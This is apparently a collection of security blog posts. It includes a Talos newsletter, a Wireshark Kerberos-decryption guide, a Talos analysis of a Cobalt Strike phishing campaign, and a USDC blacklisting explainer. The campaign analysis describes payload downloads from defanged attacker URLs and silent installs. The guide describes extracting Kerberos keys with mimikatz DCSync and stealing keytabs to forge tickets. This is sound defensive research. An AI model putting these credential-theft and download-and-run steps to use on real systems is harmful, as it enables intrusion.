
Threat Source newsletter (Sept. 29, 2022) — Attackers are already using student loan relief for scams

29 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve spent the past few months with my colleague Ashlee Benge looking at personal health apps’ privacy policies. We found several instances of apps that handle sensitive information whose privacy policies state they will share certain data with third-party advertisers and even law enforcement agencies, if necessary. 

One of the most popular period-tracking apps on the Google Play store, Period Calendar Period Tracker, has a privacy policy that states it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only." 

A Washington Post report released last week also found that this app, as well as popular health sites like WebMD, “gave advertisers the information they’d need to market to people, or groups of consumers based on their health concerns.” 

These were all things I had never considered before. I’m sure I’m not alone in just going to Google to type in “pain in left flank” or something along those lines to see if I’m dying or not. The research Ashlee and I did really made me rethink the type of information I’m inputting into apps on my phone, especially around my health. For example, I de-coupled the Google Fit tracking from my phone so it’s not just counting steps in the background. And I’ve switched to a privacy-focused browser on my personal computer at home (it doesn’t help that I’m also mad at Chrome for ending support for ad blockers).  

I’m actually mad at myself that it took me this long to think more critically about this topic. The research has always been out there. 

A 2018 study from Privacy International found that 61 percent of the apps it tested started sharing data with Facebook the instant a user opened them. This was at the peak of the discussion around the Cambridge Analytica/Facebook scandal. And the U.S. Federal Trade Commission filed a complaint against the Flo period-tracking app in January 2021 for misleading users about who it sends personal information to. 

We, collectively as a society, should have always been taking this issue more seriously. And the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization is highlighting how personal data stored on apps could lead to legal consequences. The warning signs have always been there, but I think we were too willing to trade our privacy for convenience, thinking many of us have “nothing to hide.”  


The one big thing 


Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year. This is a growing challenge for companies that now have remote workers all over the globe, many of whom may never come back to the office again. If one of these employees leaves, their departure could open some major security gaps. Over the past six months to a year, Talos has seen an increasing number of incident response engagements involving malicious insiders and unwitting assets compromised via social engineering. 

Why do I care? 

Insider threats are different from the “traditional” cyber attacks we think of because they don’t involve a threat actor sitting in an entirely different country lobbing malicious code at a network. They usually involve socially engineering someone into unwittingly letting their guard down and providing access to a malicious user, or giving up sensitive information in exchange for money. This can happen to anyone anywhere, and increasingly does in the era of hybrid work. 

So now what?

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost, insiders are typically allowed to access the network and have valid login credentials. This is where traditional security controls like user and access controls come into play. Organizations should limit the amount of access a user has to the minimum required for them to perform their job. 

 

Top security headlines from the week


Ukraine is warning that Russian state-sponsored actors are still targeting critical infrastructure with cyber attacks. The campaigns are likely intended to “increase the effect of missile strikes on electrical supply facilities,” the Ukrainian government said. The warning also stated that the actors would target Baltic states and Ukrainian allies with distributed denial-of-service attacks. Meanwhile, the U.S. continues to invest money in Ukraine’s cyber defenses, and volunteer hackers continue to pitch in across the globe. (CyberScoop, Voice of America) 

U.K. police arrested a teenager allegedly involved in the recent Rockstar data breach, which included leaked information regarding the upcoming “Grand Theft Auto VI” video game. The suspect may have ties to the Lapsus$ extortion group and some involvement in another data breach against the Uber rideshare company. Lapsus$’s recent activities differ vastly from traditional APT goals, which usually center on making money somehow; the group instead seemingly wants to cause chaos for the sake of it. These two major breaches highlight the fact that many major organizations have unaddressed vulnerabilities. (TechCrunch, Wired) 

A disgruntled developer leaked the encryptor behind the LockBit 3.0 ransomware, the latest in a line of drama with the group. The builder works and could allow anyone to build their own ransomware. The Bl00Dy ransomware gang has already started to use the leaked builder in attacks against companies. Bl00Dy has been operating since May 2022, first targeting medical and dental offices in New York. In the past, the group has also used leaked code from Babuk and Conti to build their ransomware payloads. They also claim to have a Tor channel they use to post leaks from affected companies if they do not pay the ransom. (The Record, Bleeping Computer) 


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 10f1561457242973e0fed724eec92f8c   
Typical Filename: ntuser.vbe   
Claimed Product: N/A    
Detection Name: Auto.1A234656F8.211848.in07.Talos 

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

Apple CoreText - An Unexpected Journey to Learn about Failure

29 September 2022 at 00:00
Late last year, I spent two to three months researching the CoreText framework, in particular the code related to the text shaping engine and the code responsible for parsing the AAT tables. During this research, I found an OOB (out-of-bounds) write in the morx table. This series of writeups documents my whole process, from selecting this attack surface to finding the bug to writing an exploit for it in Safari.

Step-by-Step Walkthrough of CVE-2022-32792 - WebKit B3ReduceStrength Out-of-Bounds Write

8 September 2022 at 00:00
Recently, ZDI released the advisory for a Safari out-of-bounds write vulnerability exploited by Manfred Paul (@_manfp) in Pwn2Own. We decided to take a look at the patch and try to exploit it. The patch is rather simple: it creates a new function (IntRange::sExt) that is used to decide the integer range after applying a sign extension operation (in rangeFor). Before this patch, the program assumes that the range stays the same after applying sign extension.
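To see why that assumption is unsound, consider how sign extension changes the range of a value: the same 32-bit bit pattern that is a large positive number when read as unsigned becomes negative once sign-extended to 64 bits. A small illustrative Python sketch (not the WebKit code):

```python
def sext32(value: int) -> int:
    """Sign-extend a 32-bit bit pattern to an arbitrary-width Python int."""
    value &= 0xFFFFFFFF            # keep only the low 32 bits
    if value & 0x80000000:         # top bit set: value is negative when signed
        return value - (1 << 32)
    return value

# The bit pattern 0x80000000 is 2147483648 read as unsigned,
# but -2147483648 after sign extension: the integer range clearly changes.
```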

Decrypt “encrypted stub data” in Wireshark

I often use Wireshark to analyze Windows and Active Directory network protocols, especially those juicy RPC 😉 But I’m often interrupted in my enthusiasm by the payload dissected as “encrypted stub data”:

Can we decrypt this “encrypted stub data?” 🤔

The answer is: yes, we can! 💪 We can also decrypt Kerberos exchanges, TGTs and service tickets, etc! And same for NTLM, as I will show you near the end.

Wait, is that magic?

Wireshark is very powerful, as we know, but how can it decrypt data? Actually there’s no magic required because we’ll just give it the keys it needs.

The key depends on the algorithm chosen (RC4, AES128, AES256…) during the Kerberos exchange, and it is derived from the password (this is simplified, but you didn’t come here to read the Kerberos RFC, right? 🤓).
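To make the derivation slightly more concrete, here is a Python sketch of the first stage of the AES256 string-to-key function from RFC 3962: PBKDF2-HMAC-SHA1 over the password, salted with the uppercase realm plus the username. The real key adds a final DK()/n-fold step omitted here, and the account names below are made up:

```python
import hashlib

def aes256_string_to_key_stage1(password: str, realm: str, username: str) -> bytes:
    """First stage of the AES256-CTS Kerberos key derivation (RFC 3962).
    The final key requires an extra DK() step, omitted for brevity."""
    salt = (realm.upper() + username).encode()
    # 4096 iterations and a 32-byte output, per the RFC defaults for AES256
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt, 4096, 32)

# Illustrative only: intermediate key material for a hypothetical lab account.
key = aes256_string_to_key_stage1("Passw0rd!", "LAB.LOCAL", "alice")
```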

My preferred method to get the Kerberos keys is to use mimikatz DCSync for the target user:

You’ll directly notice the AES256, AES128, and DES keys at the bottom, but what about the RC4 key? As you may have guessed, it’s simply the NT hash 😉

Just remember that modern Windows environments will likely use AES256 so that’s what we’ll target.

Keep tabs on the keys

Kerberos keys are commonly stored in “keytab” files, especially on Linux systems. By the way, if you find a keytab during a pentest, don’t forget to extract its keys because you’ll be able to create a silver ticket against the service, as I once did (see below ️⬇️️), or access other services with this identity.

Clément Notin on Twitter: “Pentest success story: 1. Steal .keytab file from a Linux server for a webapp using Kerberos authentication 🕵️ 2. Extract Kerberos service encryption key using https://t.co/itX7S337o0 3. Create silver ticket using #mimikatz 🥝 and pass-the-ticket 4. Browse the target 5. Profit! 😉 pic.twitter.com/yI9yfoXDrb”

So it’s no surprise that Wireshark expects its keys in a keytab too. It’s a binary format which can contain several keys, for different encryption algorithms, and potentially for different users.

Wireshark wiki describes how to create the keytab file, using various tools like ktutil. But the one I found the most convenient is keytab.py, by Dirk-jan @_dirkjan Mollema, who wrote it to decrypt Kerberos in his research on Active Directory forest trusts. I especially like that it doesn’t ask for the cleartext password, just the raw keys, contrary to most other tools.

First, download keytab.py (you don’t even need the entire repo). Additionally, install impacket if you have not already done so.

Then, open the script and edit lines 112 to 118 and add all the keys you have (in hexadecimal format) with the number corresponding to their type. For example, as we said, most of the time AES256 is used, corresponding to type 18.

The more keys you have, the better 🎉 If you are hesitant, you can even include the RC4 and AES256 keys for the same user. As Dirk-jan comments in the code, you can include the “krbtgt” key, “user” keys (belonging to the client user), “service” keys (belonging to the service user), and even “trust” keys (if you want to decrypt referral tickets in inter-realm Kerberos authentications). You can also add “computer account” keys to decrypt machines’ Kerberos communications (machine accounts in AD are users after all! Just don’t forget the dollar at the end when requesting their keys with DCSync). You don’t need to worry about the corresponding username or domain name in the keytab; it doesn’t matter for Wireshark.
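For illustration, an edited key list could look like the following. The exact variable name and layout in keytab.py may differ slightly, and the hex values here are placeholders rather than real secrets; only the encryption type numbers are meaningful (they follow RFC 3961):

```python
# Encryption type numbers per RFC 3961:
#   23 = RC4-HMAC (the key is simply the NT hash)
#   17 = AES128-CTS, 18 = AES256-CTS
keys = [
    # AES256 key of the client user (placeholder hex, not a real key)
    (18, "ab" * 32),
    # RC4 key of the same user, i.e. its NT hash (placeholder)
    (23, "cd" * 16),
    # AES256 key of krbtgt, needed to decrypt TGTs (placeholder)
    (18, "ef" * 32),
]
```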

Finally, run the script and pass the output filename as argument:

$ python keytab.py keytab.kt

Back to Wireshark

Configuration

Now that you have the keytab, open the Wireshark Preferences window, and under Protocols, look for “KRB5”.

Check “Try to decrypt Kerberos blobs” and Browse to the location of the keytab file you just generated.

Decrypt Kerberos

Now you can try opening some Kerberos exchanges. Everything that is properly decrypted will be highlighted in light blue. Here are a couple examples:

AS-REQ with the decrypted timestamp
AS-REP with the decrypted PAC (containing the user’s privileges, see [MS-PAC])
TGS-REP with its two parts, including the service ticket, both containing the same session key

⚠️ If you notice parts highlighted in yellow it means that the decryption failed. Perhaps the corresponding key is missing in the keytab, or its value for the selected algorithm was not provided (check the “etype” field to see which algorithm is used). For example:

👩‍🎓 Surprise test about Kerberos theory: can you guess whose key I provided here, and whose key is missing?

Answer: We observe that Wireshark can decrypt the first part which is the TGT encrypted with the KDC key, but it cannot decrypt the second part which is encrypted with the client’s key. Therefore, here the keytab only contains the krbtgt key.

Decrypt other protocols

Do you remember how this all began? I wanted to decrypt RPC payloads, not the Kerberos protocol itself!

And… it works too! 💥

A quick reminder first: the same color rule applies, blue means decryption succeeded and yellow means errors. If you see some yellow during the authentication phase of the protocol (here, the Bind step), the rest almost certainly cannot be decrypted:

Here are some examples where it works, notice how the “encrypted stub data” is now replaced with “decrypted stub data” 🏆

It also works with other protocols, like LDAP:

workstation checking if its LAPS password is expired, and thus due for renewal

Additional tips

A modified keytab file does not take effect immediately in Wireshark. Either open the Preferences, disable Kerberos decryption, confirm, then re-open the Preferences and re-enable it, which is slow and annoying; or, the fastest way I’ve found: save the capture, close Wireshark and re-open the capture file.

What about NTLM? Can we do the same decryption if NTLM authentication is used? The answer is yes! 🙂

In the Preferences, scroll to the “NTLMSSP” protocol and type the cleartext password in the “NT Password” field. This is described in the Wireshark NTLMSSP wiki page, where I have added some examples. There are some limitations compared to Kerberos: you need the cleartext password, and it must be ASCII-only (this limitation is mentioned in the source code), so it is not applicable to machine account passwords; and you can only provide one password at a time, whereas a keytab can hold keys for several users.

Conclusion

I hope these tips will help you in your journey to examine “encrypted stub data” payloads using Wireshark. This is something that we often do at Tenable when doing research on Active Directory, and I hope it will benefit you too!

Protocols are increasingly encrypted by default, which is a very good thing. But it means packet capture analysis without decryption capabilities will become less and less useful, and I’m thankful to see these tools include such features. Do you know other protocols that Wireshark can decrypt? Or perhaps with other tools?


Decrypt “encrypted stub data” in Wireshark was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

28 September 2022 at 12:12
By Chetan Raghuprasad and Vanja Svajcer.
  • Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
  • Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
  • The attack involves a multistage and modular infection chain with fileless, malicious scripts.

Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.

The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository.

Talos discovered two attack methodologies employed by the attacker in this campaign: one in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts, and another in which the malicious VB downloads and runs a Windows executable that executes malicious PowerShell commands to download and implant the payload.

The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high-reputation domain configured, a redirection technique used to masquerade the beacon's traffic.

Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads.

This campaign is a typical example of a threat actor generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defenses to protect effectively against fileless threats.

Organizations should be constantly vigilant for Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stages of the attack's infection chain.

Initial vector

The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information.

Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program.

The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government.

Contents of maldoc sample 1.

Another maldoc of the same campaign contains a job description advertising for roles related to delegating development, PSA plus — a prominent New Zealand trade union — and administrative support for National Secretaries at the Public Service Association office based out of Wellington, New Zealand. The contents of this maldoc lure resemble the legitimate job description documents for the New Zealand Public Service Association, another workers' union for New Zealand federal employees, headquartered in Wellington.

Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. On May 6, 2022, the threat actor constructed the maldoc with these text lures to make it appear to be a legitimate document. Talos' observation shows that the threat actors are also regular consumers of online news.

Attack methodologies

Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.

Talos discovered two different attack methodologies in this campaign with a few variations in TTPs, while the initial infection vector, the use of the remote template injection technique and the final payload remained the same.

Method 1

This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:

Summary of attack method 1 infection chain.

Stage 1 maldoc: DOTM template

The malicious Word document contains an embedded URL, https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.

Contents of settings.xml.rels of maldoc.
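Reconstructed for illustration (the Id and Type values are typical of the remote template injection technique, not copied from the sample; the URL is defanged), such a relationship entry looks like:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
      Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
      Target="https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm"
      TargetMode="External"/>
</Relationships>
```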

Stage 2: VBA dropper

The downloaded DOTM executes the malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written into an HTA file, "example.hta," in the user profile local application temporary folder. The decoded content written to the HTA file is the next VB script, which is executed using the ShellExecute method.

Stage 2 VBA dropper.

Stage 3 VB script

The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed.

Stage 3 VB script.

Stage 4 PowerShell script

The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and another base64-encoded string of a decryption key. The encoded strings are converted to generate the AES encrypted data block and the 256-bit AES decryption key. Using the decryption key, the encrypted data generates a PowerShell downloader script, which is executed using the PowerShell IEX function.

Stage 4 PowerShell script.

Stage 5 PowerShell downloader

The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions.

The following actions are performed by the script upon its execution in victim's system memory:

  1. The script downloads the payload from the actor controlled remote location through the URL "https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile local application temporary folder.
  2. The script performs a check on the file extension of the downloaded payload file.
  3. If the payload has the extension .dll, the script will run the DLL using rundll32.exe, exhibiting the use of the sideloading technique.
  4. If the payload has an MSI file extension, the payload is executed using the command
    "msiexec /quiet /i <payload>".
  5. If the payload is an EXE file, then it will run it as a process using the PowerShell commandlet
    Start-Process.
  6. Upon running the payload, the script will hide the payload file to establish persistence by setting the "hidden" file system attribute of the payload file.
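The extension-based dispatch in steps 2 through 5 can be sketched as follows (an illustrative Python re-implementation of the logic, not the actor's actual PowerShell):

```python
import os

def run_command_for_payload(path: str) -> str:
    """Return the command the stage 5 script would use, chosen by the
    downloaded payload's file extension."""
    ext = os.path.splitext(path)[1].lower()
    if ext == ".dll":
        # DLL payloads are run through rundll32.exe (sideloading)
        return f"rundll32.exe {path}"
    if ext == ".msi":
        # MSI payloads are installed silently
        return f"msiexec /quiet /i {path}"
    # anything else (EXE) is started as a regular process
    return f"Start-Process {path}"
```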

During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon.

Stage 5 PowerShell downloader.

Method 2

The second attack method of this campaign is also modular, but uses less sophisticated Visual Basic and PowerShell scripts. We spotted that, in this attack chain, the actor employed a 64-bit Windows executable downloader which executes the PowerShell commands responsible for downloading and running the Cobalt Strike payload.

Summary of attack method 2 infection chain.

Stage 1 maldoc: DOTM template

When a victim opens the malicious document, Windows attempts to download a malicious remote DOTM template through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/ww.dotm," which was embedded in the relationship component of the file "settings.xml.rels."

Contents of settings.xml.rels of maldoc.

Stage 2 VB script

The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function.

Stage 2 VB script.

Stage 3 PowerShell downloader

The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine.

Stage 3 PowerShell downloader.

Stage 4 downloader executable

The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes a PowerShell command which downloads the Cobalt Strike payload DLL through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/strymon.png" to the user profile local application temporary directory with a spoofed .png extension, then sideloads the DLL using rundll32.exe.

Stage 4 downloader EXE.

The downloader also executes a ping command to the IP address 1[.]1[.]1[.]1, followed by a delete command to remove itself. The ping simply introduces a delay before the downloader is deleted.

Payload

Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modularised, customizable attack framework: threat actors can add or remove features according to their malicious intentions. Employing Cobalt Strike beacons in the attack's infection chain allows the attackers to blend their malicious traffic with legitimate traffic and evade network detections. And with the ability to configure commands in the beacon configuration, the attacker can perform various malicious operations, such as injecting other malicious binaries into the running processes of the infected machines, and can avoid implanting a separate injection module in the infection chain.

The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:
  • C2 server.
  • Communication protocols.
  • Process injection techniques.
  • Malleable C2 Instructions.
  • Target process to spawn for x86 and x64 processes.
  • Watermark: "Xi54kA==".
Cobalt Strike beacon configuration sample.

The Cobalt Strike beacon used in this campaign has the following capabilities:
  • Executes arbitrary codes in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:
  x86:
    "%windir%\syswow64\dns-sd.exe"
    "%windir%\syswow64\rundll32.exe"
    "%windir%\syswow64\dllhost.exe -o enable"

  x64:
    "%windir%\sysnative\getmac.exe /V"
    "%windir%\sysnative\rundll32.exe"
    "%windir%\sysnative\DeviceParingWizard.exe"

  • A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection.

Malicious repository

The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https[://]bitbucket[.]org/atlasover/atlassiancore/downloads and https[://]bitbucket[.]org/clouchfair/oneproject/downloads.

During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.

Attacker-controlled bitbucket repository.

Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL.

Command and control

Talos discovered the C2 server operated in this campaign at the IP address 185[.]225[.]73[.]238, running Ubuntu Linux version 18.04, located in the Netherlands and part of the Alibaba cloud infrastructure.

Shodan search results showed us that the C2 server contained two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, which are valid from July 14, 2022 - July 14, 2023.

SSL certificate associated with the C2 servers.



Pivoting on the SSL certificates disclosed another Cobalt Strike C2 server at the IP address 43[.]154[.]175[.]230, running Ubuntu Linux version 18.04 and located in Hong Kong, which is also part of the Alibaba cloud infrastructure and is most likely operated by the same actor behind this campaign.

Coverage

Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.

The following ClamAV signatures have been released to detect this threat:
Win.Packed.Generic-9956955-0
Win.Malware.CobaltStrike-9968593-1
Win.Dropper.AgentTesla-9969002-0
Win.Dropper.Swisyn-9969191-0
Win.Trojan.Swisyn-9969193-0
Win.Malware.RedlineStealer-9970633-0

IOC

The IOC list is available in Talos' Github repo here.


How Circle Banned Tornado Cash Users

28 September 2022 at 09:00

Tornado Cash is an open-source, decentralised cryptocurrency mixer. Using zero-knowledge proofs, it mixes identifiable funds with others, obscuring the original source of the funds. On 8 August 2022, the U.S. Office of Foreign Assets Control (OFAC) banned the Tornado Cash mixer, arguing that it had played a central role in the laundering of more than $7 billion.

The USD Coin (USDC) is a centralised digital currency that can be used for online payments. The issuer of the USDCs – the Circle company – guarantees that every digital coin is fully backed by actual U.S. dollars, with the value of one USDC pegged to an actual U.S. dollar. Following the ban, the Circle company started to freeze addresses linked with the Tornado Cash mixer.

This article does not aim to address any political views or opinions but rather to present an interesting case study on how this was technically achieved. We can seize this opportunity to investigate several basic but key concepts of Ethereum and Ethereum-based blockchains. For simplicity, in this article we will primarily focus on Ethereum.

Understanding ERC-20 Tokens

With Ethereum, tokens are handled by smart contracts: short, simple programmes stored on the blockchain that can be called via transactions. Among other things, the smart contract is responsible for handling users’ transactions and storing owners’ balances.

A standard ABI (Application Binary Interface) for manipulating tokens, called ERC-20 (Ethereum Request for Comments 20), was released to ease interoperability; it is described in Ethereum Improvement Proposal (EIP) 20. USDC follows that standard.

ERC-20 specifications are fairly short. To be a valid ERC-20 token, the deployed smart contract must simply implement the following functions:

  • totalSupply()
  • balanceOf(account)
  • allowance(owner, spender)
  • approve(spender, amount)
  • transfer(recipient, amount)
  • transferFrom(sender, recipient, amount)

It must also implement the following events:

  • Transfer(from, to, value)
  • Approval(owner, spender, value)
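
For reference, this surface can be written down as an ethers.js human-readable ABI fragment; the sketch below is ours, but any ERC-20 contract object can be instantiated from such a list:

```typescript
// The ERC-20 functions and events above, as an ethers.js human-readable ABI.
const ERC20_ABI: string[] = [
  "function totalSupply() view returns (uint256)",
  "function balanceOf(address account) view returns (uint256)",
  "function allowance(address owner, address spender) view returns (uint256)",
  "function approve(address spender, uint256 amount) returns (bool)",
  "function transfer(address recipient, uint256 amount) returns (bool)",
  "function transferFrom(address sender, address recipient, uint256 amount) returns (bool)",
  "event Transfer(address indexed from, address indexed to, uint256 value)",
  "event Approval(address indexed owner, address indexed spender, uint256 value)",
];
```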

The USDC token

To understand how the USDC was implemented we only need the smart contract address and its source code, published by Circle:

There is a subtlety here but we will not go into detail. The source code for the real ERC-20 API for USDC can be retrieved from a proxy contract, which can be found at the following address:

You can check OpenZeppelin’s Unstructured Storage proxy pattern for more information. In short, using a proxy contract is a convenient way to manage upgrades.

The totalSupply() function

The totalSupply() function is pretty much self-explanatory and can be used at any time to find out how many tokens were minted in total.

Open Etherscan and search for the USDC contract address. Go to the “Contract” tab next to “Transactions”, “Internal Txns” and “Erc20 Token Txns”. Then click on the “Read as Proxy” button and scroll down the list to “totalSupply”.

At the time of writing, this returned 42039807469599550, i.e. 42,039,807,469.599550 USDC once the decimals are applied. ERC-20 tokens may optionally implement a decimals() function, which is set to 6 here. Because we only “read” from the blockchain, these operations are free.
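
As a sanity check, the decimal conversion can be reproduced by hand. The following sketch mirrors what ethers.utils.formatUnits does for a token with 6 decimals (the function name is ours, not part of any library):

```typescript
// Convert a raw ERC-20 integer amount to a human-readable decimal string.
function toDecimalString(raw: bigint, decimals: number): string {
  const base = 10n ** BigInt(decimals);
  const whole = raw / base; // integer part
  const frac = (raw % base).toString().padStart(decimals, "0"); // fractional part
  return `${whole}.${frac}`;
}

console.log(toDecimalString(42039807469599550n, 6)); // "42039807469.599550"
```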

The transfer() Function

In order to send an ERC-20 token to another address, one would need to send a transaction to the transfer() function with the recipient address and the number of tokens to send as arguments. To make things easier we will only discuss here how a transaction is sent to a full Ethereum node and skip the part where it is actually added to the blockchain.

Let us examine how the transfer() function was implemented. The published code is written in Solidity; it is mostly straightforward, and you do not need to know the language to understand what follows.

You can see notBlacklisted(msg.sender) and notBlacklisted(to) on lines 867 and 868. These are function modifiers, similar to Python’s decorators, and they wrap the function underneath.

The source code of the modifier is quite explicit. In Solidity, require() is a control function whose first argument must evaluate to true; otherwise the transaction is reverted. Here the _account address is checked against the blacklisted mapping, which is simply a hash table: accessed with a key (the address), it returns a value, and if the address is not in the mapping, 0 is returned.

The value msg.sender is the address issuing the transaction, and to is the recipient. If neither address is found in the blacklisted mapping, the _transfer() function is called and the transaction goes through.
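
The gate can be summed up with a small TypeScript model; this is a toy sketch of the Solidity logic, not Circle’s actual code:

```typescript
// Toy model: transfer() succeeds only if neither the sender nor the
// recipient is present in the blacklisted mapping.
const blacklisted = new Set<string>();

function requireNotBlacklisted(account: string): void {
  // Mirrors Solidity's require(!blacklisted[_account], ...): throwing
  // here plays the role of reverting the transaction.
  if (blacklisted.has(account)) throw new Error("account is blacklisted");
}

function transfer(msgSender: string, to: string): boolean {
  requireNotBlacklisted(msgSender);
  requireNotBlacklisted(to);
  // ... _transfer(msgSender, to, amount) would run here ...
  return true;
}
```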

The blacklisted mapping is filled using the blacklist function.

Similarly, the onlyBlacklister() modifier prevents unauthorised blacklisting of addresses.

TransferFrom() and Approve() functions

The transferFrom() function is very similar to the transfer() function and is mostly used by smart contracts to transfer tokens on your behalf. In theory it is possible to send tokens directly to a smart contract using transfer() and then call the desired function. However, this requires two transactions and the smart contract would have no idea about the first one.

The solution is to grant a smart contract access to transfer a limited or unlimited amount of tokens. This is achieved using the approve() function.

Following approval, the transferFrom() function can be called.

Both functions are of course covered by the notBlacklisted() modifier.
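
The approve()/transferFrom() flow can be modelled in a few lines. This is a toy sketch of the bookkeeping; the real balances and allowances live in the contract’s storage:

```typescript
// Toy ERC-20 allowance bookkeeping.
const balances = new Map<string, bigint>();
const allowances = new Map<string, bigint>(); // key: "owner:spender"

function approve(owner: string, spender: string, amount: bigint): void {
  allowances.set(`${owner}:${spender}`, amount);
}

function transferFrom(spender: string, from: string, to: string, amount: bigint): void {
  const key = `${from}:${spender}`;
  const allowed = allowances.get(key) ?? 0n;
  const balance = balances.get(from) ?? 0n;
  // Insufficient allowance or balance reverts the transaction.
  if (allowed < amount || balance < amount) throw new Error("reverted");
  allowances.set(key, allowed - amount);
  balances.set(from, balance - amount);
  balances.set(to, (balances.get(to) ?? 0n) + amount);
}
```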

How to check whether an address is blacklisted

